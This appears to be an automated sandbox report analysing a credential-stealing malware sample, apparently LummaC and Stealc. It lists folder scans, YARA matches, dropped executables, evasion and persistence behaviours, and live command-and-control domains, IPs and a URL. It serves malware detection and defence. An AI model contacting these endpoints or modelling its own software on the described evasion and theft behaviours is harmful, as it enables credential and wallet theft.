Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.1695973685.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682695202.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682378325.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2580293126.0000000001772000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2622372839.0000000001771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2590778879.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2603936780.000000000176E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1724503778.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1728050949.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1710137219.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682138495.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682087443.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2620779995.0000000001771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2644607291.0000000001772000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1696023139.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1724342554.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2623509191.0000000001771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1696327370.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2580198517.000000000176F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2603984252.000000000177B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003B.00000003.2664417098.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9eba8044e7.exe PID: 5448, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9eba8044e7.exe PID: 5448, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003147001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546642 Sample: file.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 133 thumbystriw.store 2->133 135 presticitpo.store 2->135 137 3 other IPs or domains 2->137 147 Suricata IDS alerts for network traffic 2->147 149 Found malware configuration 2->149 151 Antivirus detection for URL or domain 2->151 153 16 other signatures 2->153 12 skotes.exe 4 30 2->12         started        17 file.exe 2 2->17         started        signatures3 process4 dnsIp5 139 185.215.113.43, 49801, 49817, 49854 WHOLESALECONNECTIONSNL Portugal 12->139 141 31.41.244.11, 49820, 80 AEROEXPRESS-ASRU Russian Federation 12->141 113 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 12->113 dropped 115 C:\Users\user\AppData\...\661f3ff865.exe, PE32 12->115 dropped 117 C:\Users\user\AppData\...\1553f88169.exe, PE32 12->117 dropped 123 8 other malicious files 12->123 dropped 187 Creates multiple autostart registry keys 12->187 189 Hides threads from debuggers 12->189 191 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->191 193 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->193 19 9eba8044e7.exe 12->19         started        23 fontcreator.exe 2 12->23         started        25 fontcreator.exe 12->25         started        143 necklacedmny.store 188.114.97.3, 443, 49730, 49731 CLOUDFLARENETUS European Union 17->143 145 185.215.113.16, 49738, 49878, 80 WHOLESALECONNECTIONSNL Portugal 17->145 119 C:\Users\user\...\KOLH45MMED0OMDDRYHIG.exe, PE32 17->119 dropped 121 C:\Users\user\...\FT773VWATWFL9SRK5RTU4.exe, PE32 17->121 dropped 195 Query firmware table information (likely to detect VMs) 17->195 197 Found many strings related to Crypto-Wallets (likely being stolen) 17->197 199 Tries to harvest and steal ftp login credentials 17->199 201 4 other signatures 17->201 27 KOLH45MMED0OMDDRYHIG.exe 4 17->27         started        29 FT773VWATWFL9SRK5RTU4.exe 9 1 17->29         started        file6 signatures7 process8 file9 83 C:\Users\...\SWJQ0719J9GFR3PZ91XO7LBLZA7.exe, PE32 19->83 dropped 85 C:\Users\...\7URDKE3CJSA37VV3INEEM0S4N1C.exe, PE32 19->85 dropped 155 Multi AV Scanner detection for dropped file 19->155 157 Query firmware table information (likely to detect VMs) 19->157 159 Tries to detect sandboxes and other dynamic analysis tools (window names) 19->159 173 2 other signatures 19->173 87 C:\Users\user\AppData\...\fontcreator.tmp, PE32 23->87 dropped 31 fontcreator.tmp 3 5 23->31         started        89 C:\Users\user\AppData\...\fontcreator.tmp, PE32 25->89 dropped 34 fontcreator.tmp 25->34         started        91 C:\Users\user\AppData\Local\...\skotes.exe, PE32 27->91 dropped 161 Antivirus detection for dropped file 27->161 163 Detected unpacking (changes PE section rights) 27->163 165 Machine Learning detection for dropped file 27->165 175 3 other signatures 27->175 36 skotes.exe 27->36         started        167 Modifies windows update settings 29->167 169 Disables Windows Defender Tamper protection 29->169 171 Tries to evade debugger and weak emulator (self modifying code) 29->171 177 3 other signatures 29->177 signatures10 process11 file12 125 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->125 dropped 127 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->127 dropped 39 fontcreator.exe 2 31->39         started        129 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 34->129 dropped 131 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 34->131 dropped 42 fontcreator.exe 34->42         started        179 Antivirus detection for dropped file 36->179 181 Detected unpacking (changes PE section rights) 36->181 183 Machine Learning detection for dropped file 36->183 185 4 other signatures 36->185 signatures13 process14 file15 93 C:\Users\user\AppData\...\fontcreator.tmp, PE32 39->93 dropped 44 fontcreator.tmp 39->44         started        95 C:\Users\user\AppData\...\fontcreator.tmp, PE32 42->95 dropped 47 fontcreator.tmp 42->47         started        process16 file17 97 C:\Users\user\AppData\Local\...\is-8C9AL.tmp, PE32 44->97 dropped 99 C:\Users\user\AppData\...\Updater.exe (copy), PE32 44->99 dropped 101 C:\Users\user\...\nvfvsdksvc_x64.exe (copy), PE32+ 44->101 dropped 109 7 other files (6 malicious) 44->109 dropped 49 cmd.exe 44->49         started        51 cmd.exe 44->51         started        53 cmd.exe 44->53         started        61 4 other processes 44->61 103 C:\Users\user\AppData\Local\...\is-21RVC.tmp, PE32 47->103 dropped 105 C:\Users\user\...\nvfvsdksvc_x64.exe (copy), PE32+ 47->105 dropped 107 C:\Users\user\AppData\Local\...\is-GF03F.tmp, PE32+ 47->107 dropped 111 6 other files (5 malicious) 47->111 dropped 55 cmd.exe 47->55         started        57 cmd.exe 47->57         started        59 cmd.exe 47->59         started        63 2 other processes 47->63 process18 process19 65 conhost.exe 49->65         started        67 2 other processes 49->67 69 3 other processes 51->69 71 3 other processes 53->71 73 3 other processes 55->73 75 3 other processes 57->75 77 3 other processes 59->77 79 9 other processes 61->79 81 5 other processes 63->81
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
188.114.97.3
 necklacedmny.store European Union
13335 CLOUDFLARENETUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Contacted Domains

Name IP Active
necklacedmny.store 188.114.97.3 true
presticitpo.store unknown unknown
thumbystriw.store unknown unknown
crisiwarny.store unknown unknown
fadehairucw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
necklacedmny.store true
    		unknown
    fadehairucw.store true
      		unknown
      http://185.215.113.43/Zu7JuNko/index.php true
      • URL Reputation: phishing
      		 unknown
      founpiuer.store true
        		unknown
        crisiwarny.store true
          		unknown
          scriptyprefej.store true
            		unknown
            presticitpo.store true
              		unknown